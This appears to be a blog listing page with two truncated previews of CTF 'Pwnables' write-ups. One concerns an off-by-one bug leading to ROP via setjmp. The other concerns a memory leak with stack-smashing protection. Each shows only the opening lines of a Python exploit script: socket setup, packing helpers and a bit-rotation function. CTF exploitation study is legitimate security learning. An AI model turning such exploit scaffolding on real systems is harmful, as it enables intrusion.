2017/01/02

Category : Pwnables Summary : off by one to rop, setjmp Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res #def ror64(value, count): def ROR(data, shift, size=64): shift %= size body = data >> shift remains = (data

Category : Pwnables Summary : memory leak with SSP protection Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res p = lambda x : pack("